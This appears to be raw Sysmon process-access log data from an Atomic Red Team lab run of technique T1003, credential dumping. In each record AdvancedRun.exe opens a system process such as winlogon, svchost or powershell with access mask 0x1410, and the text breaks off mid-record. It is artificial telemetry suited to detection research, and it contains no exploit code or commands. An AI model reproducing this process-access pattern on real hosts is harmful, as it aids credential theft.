10341000x80000000000000003942847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942845Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942844Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942843Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942842Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003942827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.999{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 